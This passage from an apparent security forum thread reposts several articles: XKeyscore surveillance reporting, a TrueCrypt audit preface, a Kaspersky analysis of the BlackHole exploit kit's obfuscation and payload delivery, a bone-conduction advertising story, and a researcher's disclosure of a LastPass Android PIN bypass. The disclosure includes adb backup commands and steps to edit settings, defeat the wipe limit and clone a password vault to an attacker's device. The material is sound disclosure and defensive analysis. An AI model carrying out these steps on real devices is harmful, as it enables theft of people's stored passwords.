- A federated query system—one query scans all sites. Performs full-take, allowing analysts to find targets that were previously unknown by mining metadata.

Revealing When and Where?

The program’s existence was most publicly revealed in July 2013 by Edward Snowden in The Sydney Morning Herald and O Globo newspapers.

What Was Snowden’s Statement?

“I, sitting at my desk, (can) wiretap anyone, from you or your accountant, to a federal judge or even the president, if I had a personal email address.” The Guardian (June 10).

Legal vs. Technical Restrictions

The FISA Amendments Act (2008) requires a warrant for targeting U.S. individuals, but NSA analysts are permitted to intercept the communications of such individuals without a warrant if they are in contact with one of the NSA’s foreign targets. The ACLU’s deputy legal director, Jameel Jaffer, told The Guardian that national security officials expressly said that a primary purpose of the new law was to enable them to collect large amounts of communications by Americans without individual warrants. The following example is provided by one XKeyscore document showing an NSA target in Tehran communicating with people in Frankfurt, Amsterdam, and New York.

The Working

What can it do?
According to The Washington Post and Marc Ambinder, editor of The Week, XKeyscore is a data retrieval system that consists of a series of interfaces, backend databases, software, and servers that select certain types of metadata that the NSA has already collected using other methods, from a wide range of different sources:

- F6, which is the SCS or special collection service, operating from a U.S. embassy or consulate overseas.
- FORNSAT, which means “foreign satellite collection,” refers to intercepts from satellites that process data used by other countries.
- The special source operations, or the SSO, is a branch of the NSA that taps cables, finds microwave paths, and otherwise collects data not generated by F6 or foreign satellites.

A training slide on page 24 of the National Security Agency’s 2008 presentation on the program states it quite baldly:

- Show me all exploitable machines in country X
- Fingerprints from TAO (tailored access operations) are loaded into XKeyscore’s application/fingerprinted engine.
- Data is tagged and databased.
- No strong-selector.
- Complex Boolean tasking and regular expression required.

According to Ars Technica’s Sean Gallagher, “the vulnerability fingerprints are added to serve as a filtering criteria for XKeyscore’s app engines, comprised of a worldwide distributed cluster of Linux servers attached to the NSA’s Internet backbone tap points.” He explains how this could give the NSA a toehold of surveillance in various countries: “This could allow the NSA to search broadly for systems within countries such as China or Iran by watching for the network traffic that comes from them through national firewalls, at which point the NSA could exploit those machines to have a presence within those networks.”

The slides explain how XKeyscore can track encrypted virtual private network (VPN) sessions and their participants, and can capture metadata on who’s using PGP (pretty good privacy) in email or who is encrypting their Word documents, which can later be decrypted. It keeps all trapped Internet traffic for three days, but the metadata is kept for up to 30 days. This one-month duration allows the authorities the time to trace the identity of those who created the documents. Further capabilities include Google Maps and web searches. It also has the ability to track the authorship and source of a particular document.

Location

Where is XKeyscore located? It works with the help of over 700 servers based in U.S. and allied military and other facilities, as well as U.S. embassies and consulates in several dozen countries.

Data Collection and Storage

How much data is being collected? The quantity of communications accessible through programs such as XKeyscore is staggeringly large. One NSA report from 2007 estimated that there were 850 billion “call events” collected and stored in the NSA database and close to 150 billion Internet records. Each day, the document says, 1 – 2 billion records were added. A 2010 Washington Post article reported that “everyday, collection systems at the [NSA] intercept and store 1.7 billion emails, phone records and other type of communications.”

How long is the data stored? The XKeyscore system is collecting a vast amount of Internet data that can be stored only for short periods of time. Content remains on the system for three to five days. The metadata, on the other hand, is stored for 30 days.
One document explains: “At some sites, the amount of data we receive per day (20 plus terabytes) can be only stored for as little as 24 hours.” In 2012, there were at least 41 billion records collected and stored in XKeyscore in a single 30-day period.

What was NSA’s response?

In a statement to The Guardian, the NSA said:

“NSA’s activities are focused and specifically deployed against—and only against—legitimate foreign intelligence targets in response to requirements that our leaders need for information necessary to protect our nation and its interests.

“XKeyscore is used as a part of NSA’s lawful foreign signals intelligence collection system.

“Allegations of widespread, unchecked analyst access to NSA collection data are simply not true. Access to XKeyscore, as well as all of NSA’s analytic tools, is limited to only those personnel who require access for their assigned tasks … In addition, there are multiple technical, manual, and supervisory checks and balances within the system to prevent deliberate misuse from occurring.”

“Every search by an NSA analyst is fully auditable, to ensure that they are proper and within the law.

“These types of programs allow us to collect the information that enables us to perform our missions successfully—to defend the nation and to protect U.S. and allied troops abroad.”

What’s more?

Many more aspects of XKeyscore have not been revealed in depth, such as which countries the U.S. shares information with, how the program contends with encrypted content, and how the program has evolved in recent years. Despite all this, the government claims some real benefits, such as 300 terrorists captured by 2008.

References:

http://www.theguardian.com/world/2013/jul/31/nsa-top-secret-program-online-data
http://nakedsecurity.sophos.com/2013/08/02/nsas-xkeyscore-is-a-global-dragnet-for-vulnerable-systems/
http://www.infowars.com/xkeyscore-instrument-of-mass-surveillance/
https://blog.fortinet.com/NSA-s-XKeyscore–the-FAQ/
http://www.huffingtonpost.com/sam-dorison/nsa-data-hacking_b_3708206.html
http://en.wikipedia.org/wiki/XKeyscore
http://www.schneier.com/blog/archives/2013/08/xkeyscore.html
http://techcrunch.com/2013/07/31/nsa-project-x-keyscore-collects-nearly-everything-you-do-on-the-internet/
http://www.thehindu.com/news/international/world/nsas-xkeyscore-surveillance-program-has-servers-in-india/article4978248.ece
http://assets.zocalo.com.mx/uploads/articles/6/137178470253.jpg
http://www1.pcmag.com/media/images/394651-xkeyscore-450.jpg?thumb=y

Sursa: http://resources.infosecinstitute.com/xkeyscore-nsas-surveillance-program/

OK, let's assume that the NSA, or whoever else, can intercept all traffic. I particularly like one idea from the article:

The slides explain how XKeyscore can track encrypted virtual private networks (VPN) sessions and their participants, can capture metadata on who’s using PGP (pretty good privacy) in email or who is encrypting their Word documents, which later can be decrypted.

In other words, if you use a VPN, use PGP in your email or encrypt your documents... you're a suspect? So the chances of drawing attention are much lower if you apparently behave like a "normal" user, without encrypting your documents and emails?
  16. Security Analysis of TrueCrypt 7.0a with an Attack on the Keyfile Algorithm

Ubuntu Privacy Remix Team <info@privacy-cd.org>
August 14, 2011

Contents

Preface
1. Data of the Program
2. Remarks on Binary Packages of TrueCrypt 7.0a
3. Compiling TrueCrypt 7.0a from Sources
   Compiling TrueCrypt 7.0a on Linux
   Compiling TrueCrypt 7.0a on Windows
4. Methodology of Analysis
5. The program tcanalyzer
6. Findings of Analysis
   The TrueCrypt License
   Website and Documentation of TrueCrypt
   Cryptographic Algorithms of TrueCrypt
   Cryptographic Modes used by TrueCrypt
   TrueCrypt Volume and Hidden Volumes
   The Random Number Generator of TrueCrypt
   The Format of TrueCrypt Volumes
7. An Attack on TrueCrypt Keyfiles
   The TrueCrypt Keyfile Algorithm
   The Manipulation of TrueCrypt Keyfiles
   Response to the Attack by the TrueCrypt Developers
8. Conclusion

Preface

We have previously analyzed versions 4.2a, 6.1a and 6.3a of the TrueCrypt program in source code without publishing our results. Now, however, for our new analysis of version 7.0a we decided to publish it. We hope that it will help people to form their own sound opinion on the security of TrueCrypt. Moreover, we solicit help in correcting any mistakes that we've made. To this end, we would like to encourage everyone reading this to send criticism or suggestions for further analysis to us. While preparing the analysis for publication we reassessed our previous results.
In doing so we discovered major weaknesses in the TrueCrypt keyfile algorithm. This could even be turned into a successful attack on TrueCrypt keyfiles. We present that attack in section 7. We want to stress that the security of TrueCrypt containers which do not use keyfiles is in no way affected by these weaknesses and the attack.

TrueCrypt is a multi-platform program. Up to now there are versions for Windows, Linux and Mac OS X. Our analysis mainly focuses on the Linux version. The Windows version has been analyzed to a lesser extent, the Mac OS X version not at all. In large parts the code base is the same for all operating systems on which TrueCrypt runs. On the other hand, there is some special code for each of these operating systems. This is even reflected in slightly diverging behavior of the program on different operating systems here and there. In the source code of TrueCrypt 7.0a there are, moreover, folders for the operating systems FreeBSD and Solaris. Apparently the source code in these folders hasn't reached a point where a program could be built and distributed from it. Therefore, we neglected them completely.

The report at hand explains the results of our analysis. It is organized as follows: Section 1 lists some data of the analyzed program. Section 2 contains remarks on binary TrueCrypt packages. Section 3 deals with compiling TrueCrypt from the sources. Section 4 explains the methodology of our analysis. In section 5 we describe our program tcanalyzer, which was written for this analysis. Section 6 contains our findings in detail, except for the attack on keyfiles, to which section 7 is devoted. Finally, section 8 presents our conclusions. The rationale for the conclusions in section 8 is mainly presented in section 6. In sections 6 and 7 some of the more elaborate technical or mathematical facts have been documented in the footnotes. Readers who don't have the special skills to understand them may safely ignore them.

Download: https://www.privacy-cd.org/downloads/truecrypt_7.0a-analysis-en.pdf
  17. Filling a BlackHole

- Exploit packs
- In the black hole
- An exploit pack's start page
- Exploit for CVE-2012-5076
- Exploit for CVE-2012-0507
- Exploit for CVE-2013-0422
- Three-in-one
- Protection from Java exploits
- Stage one: block redirects to the landing page
- Stage two: detection by the file antivirus module
- Stage three: signature-based detection of exploits
- Stage four: proactive detection of exploits
- Stage five: detection of the downloaded malware (payload)
- Conclusion

Today, exploiting vulnerabilities in legitimate programs is one of the most popular methods of infecting computers. According to our data, user machines are most often attacked using exploits for Oracle Java vulnerabilities. Today's security solutions, however, are capable of effectively withstanding drive-by attacks conducted with the help of exploit packs. In this article, we discuss how a computer can be infected using the BlackHole exploit kit and the relevant protection mechanisms that can be employed.

Exploit packs.

As a rule, instead of using a single exploit, attackers employ ready-made sets known as exploit packs. This helps them to significantly increase the effectiveness of 'penetration', since each attack can utilize one or more exploits for software vulnerabilities present on the computer being attacked. Whereas in the past exploits and malicious programs downloaded with their help to victims' computers were created by the same people, today this segment of the black market operates according to the SaaS (Software as a Service) model.

As a result of the division of labor, each group of cybercriminals specializes in its own area: some create and sell exploit packs, others lure users to exploit start pages (drive traffic), still others write the malware that is distributed via drive-by attacks. Today, all a cybercriminal wishing to infect user machines with, say, a variant of the ZeuS Trojan needs to do is buy a ready-made exploit pack, set it up and get as many potential victims as possible to visit the start page (also called a landing page).

Attackers use several methods to redirect users to an exploit pack's landing page. The most dangerous one for users is hacking pages of legitimate websites and injecting scripts or iframe elements into their code. In such cases, it is enough for a user to visit a familiar site for a drive-by attack to be launched and for an exploit pack to begin working surreptitiously. Cybercriminals can also use legitimate advertising systems, linking banners and teasers to malicious pages. Another method that is popular among cybercriminals is distributing links to the landing page in spam.

Infecting user machines using exploit packs: an overview diagram

There are numerous exploit packs available on the market: Nuclear Pack, Styx Pack, BlackHole, Sakura and others. In spite of the different names, all these 'solutions' work in the same way: each exploit pack includes a variety of exploits plus an administrator panel. Moreover, the operation of all exploit packs is based on what is essentially the same algorithm.

One of the best-known exploit packs on the market is called BlackHole. It includes exploits for vulnerabilities in Adobe Reader, Adobe Flash Player and Oracle Java. For maximum effect, exploits included in the pack are constantly modified. In early 2013, we studied three exploits for Oracle Java from the BlackHole pack, so we selected BlackHole to illustrate the operating principles of exploit packs.

In the black hole.
It should be noted that all data on exploits, the contents of start pages and other specific information discussed in this article (particularly the names of methods and classes and the values of constants) was valid at the time the research was carried out. Cybercriminals are still actively developing BlackHole: they often modify the code of one exploit or another to hinder detection by anti-malware solutions. For example, they may change the decryption algorithm used by one of the exploits. As a result, some of the code may differ from that shown in the examples below; however, the underlying principles of operation will remain the same.

Note: We print all changeable data in small type.

An exploit pack's start page.

An exploit pack's start page is used to determine input parameters and make decisions on the exploit pack's further actions. Input parameters include the version of the operating system on the user machine, browser and plugin versions, system language etc. As a rule, the exploits to be employed in attacking a system are selected based on the input parameters. If the software required by the exploit pack is not present on the target computer, an attack does not take place.

Another reason an attack may not take place is to prevent the exploit pack's contents from falling into the hands of experts at anti-malware companies or other researchers. For example, cybercriminals may 'blacklist' IP addresses used by research companies (crawlers, robots, proxy servers), block exploits from launching on virtual machines, etc.

The screenshot below shows a sample of code from the landing page of the BlackHole exploit kit.

Screenshot of code from the BlackHole exploit kit's start page

Even a brief look at the screenshot is sufficient to see that the JavaScript code is obfuscated and most information is encrypted. Visiting the start page will result in execution of the code that was originally encrypted.

Note: Algorithm for decrypting the JavaScript code that was in use in January 2013: populate variables "z1 – zn" with encrypted data, then concatenate these variables into one string and decrypt the data as follows: every two characters (the character "-" is ignored) are considered to make up a 27-ary number, which is converted to decimal; add "57" to the value obtained and divide the result by 5; convert the resulting number back to a character using the function "fromCharCode". The code which performs these operations is marked with blue ovals on the screenshot above. The second array consists of decimal numbers from 0 to 255, which are converted to characters using the ASCII table. Both code fragments obtained by conversion are executed using the "eval" command (shown on the screenshot with red arrows).

The entire algorithm above could have been implemented with a few lines of code, but the cybercriminals used special techniques (marked with yellow ovals in the screenshot) to make detection more difficult:

- deliberately causing an exception with the "document.body*=document" command;
- checking the style of the first <div> element using the command "document.getElementsByTagName("d"+"iv")[0].style.left===""" ; note that an empty <div> element is inserted for this purpose into the document (in the second line);
- calling "if(123)", which makes no sense, since this expression is always true;
- breaking up function names and subsequently concatenating the parts.
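To make the decoding routine quoted in the note above a little more concrete, here is a rough Python transcription of those steps. It is purely illustrative: the function names are mine, and the exact constants and ordering change between BlackHole revisions.

  # Illustrative only: a literal transcription of the landing-page decoding
  # steps described in the note above (base-27 pairs, +57, /5). Not real kit code.
  def decode_blackhole_layer(blob):
      blob = blob.replace("-", "")          # the '-' characters are ignored
      out = []
      for k in range(0, len(blob) - 1, 2):
          pair = blob[k:k + 2]              # every two characters ...
          value = int(pair, 27)             # ... form a base-27 number
          value = (value + 57) // 5         # add 57, divide the result by 5
          out.append(chr(value))            # fromCharCode equivalent
      return "".join(out)

  # The second stage described above is a plain array of decimal ASCII codes:
  def decode_ascii_array(numbers):
      return "".join(chr(n) for n in numbers)

In the real kit, both decoded strings are then handed to eval(), which is why the page source itself never contains readable JavaScript.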
In addition to the tricks described above, cybercriminals use numerous minor code changes that can hamper signature-based detection. Although our antivirus engine, for example, includes a script emulator and simple changes in constants and operations will not affect the effectiveness of detection, the tricks described above can make things more difficult for an emulator, too.

After decryption, code appears in RAM — we will refer to it as the "decrypted script". It consists of two parts. The first part is a module based on the free PluginDetect library, which can be used to determine the versions and capabilities of most modern browsers and their plugins. Cybercriminals use a variety of libraries, but this module is a key element of any exploit pack. BlackHole uses PluginDetect to select the appropriate exploits for download depending on the software installed on the user machine. By 'appropriate' we mean those exploits which have the highest chances of successfully running and launching malware on a specific PC.

The second part of the "decrypted script" is code responsible for processing the results produced by PluginDetect functions and then downloading the exploits selected and launching them. In March 2013, BlackHole used exploits for the following vulnerabilities:

- Java versions from 1.7 to 1.7.?.8 – CVE-2012-5076;
- Java versions below 1.6 or from 1.6 to 1.6.?.32 – CVE-2012-0507;
- Java versions from 1.7.?.8 to 1.7.?.10 – CVE-2013-0422;
- Adobe Reader versions below 8 – CVE-2008-2992;
- Adobe Reader version 8 or from 9 to 9.3 – CVE-2010-0188;
- Adobe Flash versions from 10 to 10.2.158 – CVE-2011-0559;
- Adobe Flash versions from 10.3.181.0 to 10.3.181.23 and below 10.3.181 – CVE-2011-2110.

Below we discuss exploits for Java vulnerabilities.

Exploit for CVE-2012-5076. Technical details
Exploit for CVE-2012-0507. Technical details
Exploit for CVE-2013-0422. Technical details

Three-in-one.

As discussed above, the three Java exploits are based on essentially the same mechanism: they obtain privileges and load the payload, which downloads and launches the target file. The three exploits also generate the same Java class file. This clearly indicates that the same person or people were behind the development of these three exploits. The only difference is the technique used to obtain unrestricted privileges for a class file.

The class file can download and launch files, decrypting parameters passed via the decrypted script. To make detection more difficult, the malicious file downloaded is usually encrypted and, consequently, does not start with a PE header. The file downloaded is usually decrypted in memory using the XOR algorithm. Passing parameters via the decrypted script is a convenient way of quickly changing the links pointing to the payload: all it takes is modifying data on the exploit pack's landing page, without having to recompile the malicious Java applet.

The three vulnerabilities discussed above are so-called logical flaws. It is impossible to control exploits for such vulnerabilities using automatic tools such as those monitoring memory integrity or the generation of exceptions. This means that such exploits cannot be detected using Microsoft's DEP or ASLR technologies or other similar automatic tools. However, there are technologies that can cope with this – an example is Kaspersky Lab's Automatic Exploit Prevention (AEP).

Protection from Java exploits.
In spite of all the efforts by cybercriminals, today’s security solutions can effectively block drive-by attacks conducted using exploit packs. As a rule, protection against exploits includes an integrated set of technologies that block such attacks at different stages. Above, we provided a description of the BlackHole exploit kit’s operating principles. Now we will demonstrate, using Kaspersky Lab solutions as an example, how protection is provided at each stage of an attack using Java exploits from BlackHole. Since the way other exploit packs operate is similar to that implemented in BlackHole, the protection structure discussed here can be applied to them, as well. Staged protection against a drive-by attack Below we discuss which protection components interact with malicious code and when. Stage one: block redirects to the landing page. An attack starts as soon as the user reaches the exploit pack’s landing page. However, the security solution’s web antivirus component can block an attack even before it starts, i.e., before a script on the landing page is launched. This protection component verifies the address of the web page before it is opened. Essentially, this is a simple check of the page’s URL against a database of malicious links, but it can block the user from visiting the exploit pack’s landing page, provided that its address is already known to belong to a malicious resource. This makes it essential for antivirus vendors to add malicious links to their databases as early as possible. Malicious URL databases can be located on user machines or in the cloud (i.e., on a remote server). In the latter case, cloud technologies help to minimize the time lag before a security product begins to block new malicious links. The ‘response time’ is reduced in this case because the security solution installed on the user machine receives information about a new threat as soon as the relevant record is added to the malicious links database, without having to wait for an antivirus database update. Cybercriminals in turn try to change domains used to host exploit pack landing pages very often to prevent security software from blocking these pages. This ultimately reduces the profitability of their business. Stage two: detection by the file antivirus module. If the user has after all reached an exploit pack’s landing page, this is where components of the file antivirus module – the static detector and the heuristic analyzer – come in. They scan the exploit pack’s landing page for malicious code. Below we analyze the operating principles, advantages and shortcomings of each component. The static detector uses static signatures to detect malicious code. Such signatures are triggered only by specific code fragments, essentially by specific byte sequences. This is the threat detection method that was used in the early antivirus solutions and its advantages are well known. They include high performance and ease of storing signatures. All a detector needs to do to come up with a verdict is compare the checksum or byte sequence of the code being analyzed to the relevant records in the antivirus database. Signatures are tens of bytes in size and easily packed, making them easy to store. The most significant shortcoming of a static detector is the ease with which a signature can be ‘evaded’. All the cybercriminals have to do to make the detector stop detecting an object is change just one byte. 
This shortcoming leads to another one: a large number of signatures is needed to cover a large number of files, which means that the databases rapidly grow in size. The heuristic analyzer also uses databases, but works according to a completely different operating principle. It is based on analyzing objects: collecting and intelligently parsing object data, identifying patterns, computing statistics etc. If the data produced as a result of this analysis matches a heuristic signature, the object is detected as malicious. The main advantage of a heuristic signature is that it enables the solution to detect a large number of similar objects provided that the differences between them are not too great. The drawback is that compared to processing static signatures, the heuristic analyzer can be slower and affect system performance. For example, if a heuristic signature is not designed efficiently, i.e., if it requires a large number of operations to perform its checks, this may affect system performance on the machine on which the antivirus solution is running. To prevent an object from being detected using a static signature, cybercriminals need to make minimal changes to the object’s code (script, executable program or file). This process can to some extent be automated. To evade heuristic detection, a malware writer needs to conduct research to find out what mechanism is used to detect the object. When the algorithm has been fully or partially analyzed, changes preventing the heuristic signature from being triggered must be made to the malicious object’s code. Clearly, ‘evading’ a heuristic signature inevitably takes cybercriminals longer than preventing detection using static signatures. This means that heuristic signatures have a longer ‘life span’. On the other hand, after malware writers have modified an object to evade heuristic detection, it also takes an antivirus vendor some time to create a different signature. As discussed above, an anti-malware solution uses different sets of signatures to scan the landing page. In their turn, malware writers modify objects on the exploit pack’s start page in order to evade signature-based detection of both types. While it is sufficient to simply break strings up into characters to evade static signatures, evading heuristics requires making use of the finer features offered by JavaScript – unusual functions, comparisons, logical expressions, etc. An example of this type of obfuscation was provided in the first part of the article. It is at this stage that malware is often detected, particularly due to excessive code obfuscation that can be regarded as a characteristic feature of malicious objects. In addition to databases stored on the computer’s hard drive, there are signatures located in the cloud. Such signatures are usually very simple, but the extremely short new-threat response time (up to five minutes from creating a signature to making it available in the cloud) means that user machines are well protected. Stage three: signature-based detection of exploits. If the security solution fails to recognize the start page of the exploit pack, the latter comes into operation. It checks which browser plugins are installed (Adobe Flash Player, Adobe Reader, Oracle Java, etc.) and makes a decision as to which exploits will be downloaded and launched. The security solution will scan each exploit being downloaded in the same way as it did the exploit pack’s landing page – using the file antivirus module and cloud-based signatures. 
The attackers in their turn try to evade detection using certain techniques, which are similar to those described above. Stage four: proactive detection of exploits. If none of the components responsible for reactive (signature-based) protection has detected anything suspicious while scanning the exploit pack’s contents and an exploit has launched, this is where proactive protection modules come in. They monitor the behavior of applications in the system in real time and identify any malicious activity. Each application is categorized, based on information provided by heuristic analysis, data from the cloud and other criteria, as “Trusted”, “Low Restricted”, “High Restricted” or “Untrusted”. Application Control restricts each application’s activity based on its category. Applications in the Trusted class are allowed all types of activity, those in the Low Restricted group are denied access to such resources as password storage, programs in the High Restricted category are not allowed to make changes to system folders, etc. All the applications being launched and all those running are analyzed by a module called Application Control in Kaspersky Lab products. This component monitors program execution in the system using low-level hooks. In addition to the above, so-called behavior stream signatures (BSS) describing malicious activity are used to detect the dangerous behavior of applications. Such signatures are developed by virus analysts and are subsequently compared to the behavior of active applications. This enables proactive protection to detect new malware versions that were not included in the Untrusted or High Restricted categories. It should be noted that this type of detection is the most effective, since it is based on analyzing data on applications’ actual current activity rather than static or heuristic analysis. It renders such techniques as code obfuscation and encryption completely ineffective, because they in no way affect the behavior of a malicious program. For more stringent control of applications to prevent their vulnerabilities from being exploited, we use a technology called Automatic Exploit Prevention (AEP). The AEP component monitors each process as it is launched in the system. Specifically, it checks the call stack for anomalies, checks the code which launched each process, etc. In addition, it performs selective checks of dynamic libraries loaded into processes. All this prevents malicious processes from being launched as a result of exploiting vulnerabilities. This is in fact the last line of defense, providing protection against exploits in the event that other protection components have failed. If an application, such as Oracle Java or Adobe Reader, behaves suspiciously as a result of exploitation, the vulnerable legitimate application will be blocked by the anti-malware solution, preventing the exploit from doing harm. Since protection at this stage is based on the program’s behavior, cybercriminals have to use sophisticated and labor-intensive techniques to evade proactive protection. Stage five: detection of the downloaded malware (payload). If an exploit does go undetected, it attempts to download the payload and run it on the user machine. As we wrote above, the malicious file is usually encrypted to make detection more difficult, which means that it does not begin with a PE header. The file downloaded is usually decrypted in memory using the XOR algorithm. 
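As a rough illustration of the single-byte XOR unpacking being described, here is a tiny Python sketch; the key value and file names are invented for the example and are not taken from any real sample.

  # Hypothetical illustration of the XOR decryption described above;
  # the key 0x42 and the file name are made up.
  def xor_decrypt(data: bytes, key: int) -> bytes:
      return bytes(b ^ key for b in data)

  with open("payload.bin", "rb") as f:       # the downloaded, "encrypted" blob
      blob = f.read()

  decrypted = xor_decrypt(blob, 0x42)
  print(decrypted[:2] == b"MZ")              # a real PE file starts with 'MZ'

This is also why the download itself does not trip simple PE-header checks: until the exploit applies the XOR key in memory, the stream looks like opaque data rather than an executable.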
Then the file is either launched from memory (usually, this is a dynamic library) or dropped on the hard drive and then launched from the hard drive. The trick of downloading an encrypted PE file enables the malware to fool antivirus solutions, because such downloads look like ordinary data streams. However, it is essential that the exploit launches a decrypted executable file on the user machine. And an anti-malware solution will subject that file to all the various protection technologies discussed above. Conclusion. Exploit packs are an integrated system for attacking victim machines. Cybercriminals devote a lot of time and effort to maintain the effectiveness of exploit packs and minimize detections. In their turn, anti-malware companies are continually improving their security solutions. Anti-malware vendors now have a range of technologies that can block drive-by attacks at all stages, including those involving exploitation of vulnerabilities. Sursa: https://www.securelist.com/en/analysis/204792303/Filling_a_BlackHole
  18. Ads Can Bombard Us Even in Our Sleep. It's Already Happening in Germany. VIDEO

Passengers riding the train who rest their head against the window are woken by a voice presenting them with a new product or service. Their surprise is even greater when they realize that only they can hear the message. The technology that makes it all possible is called "bone conduction" and, in the coming years, it could be present in most trains and buses, according to stirileprotv.ro.

With suburban commuters in mind, an advertising agency from Dusseldorf came up with a novel proposal: the "talking window," which seems to communicate almost telepathically, only with those who touch their head to the glass. Out of nowhere, passengers whose head slips as they doze and comes to rest against the window hear an advertising message. When they realize the window is "talking" to them, most check the reaction of the people around them. They are genuinely surprised to discover that they are the only ones in the carriage who can hear the message.

It's all made possible by a small device placed on the window, programmed to vibrate when it senses pressure.

Sebastian Hardieck, creative department: "A bone in the body vibrates, and the ear then interprets those high-frequency vibrations and turns them into sound. You bring your head close to the window and you hear no sound, but the ear still hears it... It is very interesting."

The technology is called "bone conduction" and allows sound to be transmitted through the vibration of the skull bones. Although some say this is what the future of advertising looks like, not everyone is thrilled by the idea.

Matthias Oomen, public transport association: "We are not at all amused by the idea of a talking window. Public transport has many advantages, and one of them is that you can travel in peace. This issue is just as important as ticket prices or passenger safety."

For now the idea is only making waves on the internet, but two thirds of the comments gathered so far are negative. Some are even calling for a boycott of the companies that would use such technology to promote their products.

Sursa: Reclamele ne pot bombarda in somn. Se intampla deja in Germania. VIDEO - www.yoda.ro
  19. And what if all these things being said about the NSA are made up precisely so that we put more emphasis on security?
  20. Where else was this made public before?
  21. Stopped working. ?
  22. A sneak peek into Android “Secure” Containers

Posted by ChrisJohnRiley on September 5, 2013

It’s been a bit quiet here on the blog, so I thought I’d take a few minutes to write up an issue I raised with the fine folks over at LastPass. Alongside the HTTP Response Code stuff, I’ve been playing around more and more with Android applications. One of the things I presented on in Vegas at the BSidesLV Underground track was breaking into Android Secure Containers. The name of the talk was cryptic for sure, mostly because said “secure” containers were anything but secure, and because I hadn’t had time to report the issues to the affected vendors. The issues I discussed weren’t tied to a single application, and affect numerous apps within the Play Store… So, here we are a month later, and LastPass has rolled out a “fix” for the issue I reported to them. This means I can give you the down and dirty details now that you’ve all updated your Android devices to the latest LastPass version (currently 2.5.1). FYI: the CVE numbers for these issues, although not referenced in the LastPass changelogs as yet, are CVE-2013-5113 and CVE-2013-5114.

This research needs a little back story to explain it, so bear with me for a minute while I set the stage.

Back Story / Testing Scenario

I started down this research track when I was looking at how Android applications provide additional security through PIN and/or password protection of specific applications. This additional layer of security offered by applications like LastPass is there to stop people who have physical access to your Android device from getting into the more secure areas of your data (e.g. passwords). With this in mind I expected the implementation of these protections to be designed to stand up to an attacker with physical access to the device (aka somebody who’s stolen/borrowed/found your Android device).

Some Facts

Without root access to the Android device, it’s not directly possible to view or alter the data of specific applications. Even if USB Debugging is enabled (by the owner, or later by an attacker with device access), it’s only possible to view specific data on the Android device, not all the juicy stuff. Everything I’m about to discuss is possible on a non-rooted device; however, USB debugging needs to be enabled to allow us to interact with the device using adb. Remember, the scenario we’re talking about here is physical device access, so this shouldn’t be a big hurdle.

Note: It goes without saying that everything that can be achieved here with ADB/USB Debugging can also be achieved through exploitation of the device… although there are much more fun things to do if you’re popping shell on a device.

The LastPass Case

LastPass allows a user to save their password within the Android application so that you don’t need to type it every time you open the app. This isn’t abnormal for applications, and like any good security-minded application they give you options to secure the access using something other than your long, long password (aka… the PIN). Given my experience, users of such applications have too much faith in the security of their devices and have no desire to type in their 32-character random LastPass password whenever they open the application (have you tried that on a handheld device? Yeah, not fun…). Much better to store the password in the secure container settings and assign a PIN to protect the app (because that’s secure!).
So with the back story and the explanation out of the way, here’s the meat of the issue.

The Meat

When I first started testing LastPass on Android (version 2.0.4 at the time) I noticed something interesting about the AndroidManifest. In particular, android:allowBackup was set to True, meaning that even though I couldn’t read or edit the configuration/settings of LastPass directly on the device (remember, non-rooted device) or via ADB (remember, USB debugging enabled, but even then no direct access), I could perform backup and restore operations via ADB. This led me down the trail of learning more about the “adb backup” command (introduced in Android ICS). What makes adb backup and restore so useful in this context is the ability to not only back up a device entirely over USB, but also to specifically back up individual application data (with or without the APK file). This makes the backup and restore much more flexible for what we’re looking at doing. After all, backing up an entire 16GB device every time gets tiring (I’m looking at you iOS).

By performing an adb backup (command: adb backup com.lastpass.lpandroid -apk) and accepting the prompt on the device, you end up with a backup.ab file containing the LastPass application (APK) and the data/configuration/settings from the application. There have been numerous discussions on the format used by Android Backup files, but I wasn’t happy with any of the solutions offered to decrypt the AB files into something usable. So I decided to automate the lengthy process in Python (see BSidesLV: Android Backup [un]packer release | Catch22 (in)security / ChrisJohnRiley) and add in some features to ease things a little. The final result is a directory output of the LastPass application (with or without the APK – your choice – screenshot is without APK).

Taking a look at the files, sp/LPandroid.xml quickly stood out as worth further analysis. As expected, the configuration file contained the username and password in encoded format (if saved within the LastPass app). Alongside this, the XML also contains an encoded version of the PIN and various other application settings. Putting aside the possibility to decode the password and PIN, a few settings caught my eye for easy wins:

- reprompt_tries – a simple integer that increases as incorrect PINs are entered
- passwordrepromptonactive
- pincodeforreprompt (holds the encoded PIN)
- requirepin

These control the password reprompt on startup and the PIN protection (yeah, you can see where this is going already).

The Story So Far

We have access to the LastPass configuration of a non-rooted device via adb backup… and we can fiddle with the resulting configuration file. However, we’re still playing about with the XML inside a backup and not with the device itself. We need to get the changes back into the device.

Next Step

Using more Python trickery goodness (see BSidesLV: Android Backup [un]packer release | Catch22 (in)security / ChrisJohnRiley) we can take the directory structure created and rebuild the Android Backup file (with the changes that we’ve made to the files, of course). Then we can restore the backup to the device (if you still have access to it) or to your own device/emulator (make sure you have the APK in the backup file or the app already installed if you want to restore to another device).

Effects

As expected, playing with reprompt_tries by setting it to a negative number (-9999 for example) allows you to bypass the 5-PIN-attempts-before-wipe feature of LastPass.
This essentially gives you 10,000 retries. If you can’t guess a 4 digit PIN in 10,000 retries, then nothing can help you. However, the easier and more fun option is the pincodeforreprompt / passwordrepromptonactive and requirepin alteration, which results in the LastPass application not requiring a PIN for entry anymore.

- Backup configuration and unpack
- Alter XML settings as required
- Pack configuration and restore
- <<< Profit >>>

After-effects

Some of the more eagle eyed amongst you may have already noticed another interesting attack vector here. The ability to backup LastPass from a device (within 30 seconds if you’re handy ;) and return the device to the owner, coupled with the freedom to restore said backup to an attacker-controlled device, makes the attack much more interesting. Not only can you do this, bypass the PIN in your own time, and then read and extract the stored passwords as desired; you can also maintain access to the user’s LastPass account until such time as they change their LastPass password itself. If the original owner alters any of the passwords they store in the LastPass service, the attacker can simply close and restart the cloned Android container to update the information from LastPass’ servers.

Note: Version 2.5.1 mentions an alteration in the way LastPass creates UUIDs. This may affect this cloning attack – as yet unconfirmed.

Round 2 – It’s not over yet

You may have noticed the use of quotes around “fix” at the beginning of this post… After LastPass got back to me to say they’d fixed the issue (actually they responded to say they’d fixed it the day before I reported it, as they’d disabled allowBackup but not pushed it to the Play Store yet), I started looking at the proposed fix and possible bypasses based on the same physical access scenario. After a few false starts I have a working bypass for their fix that once again allows the attack (with an additional step). Once they’ve fixed the fix, I’ll let you guys know how that one went down. Until then, make sure you upgrade your LastPass to the latest Play Store version (2.5.1 at this time) and keep an eye out for further fixes!

Links:

android:allowBackup > R.attr | Android Developers
Android ADB > Android Debug Bridge | Android Developers
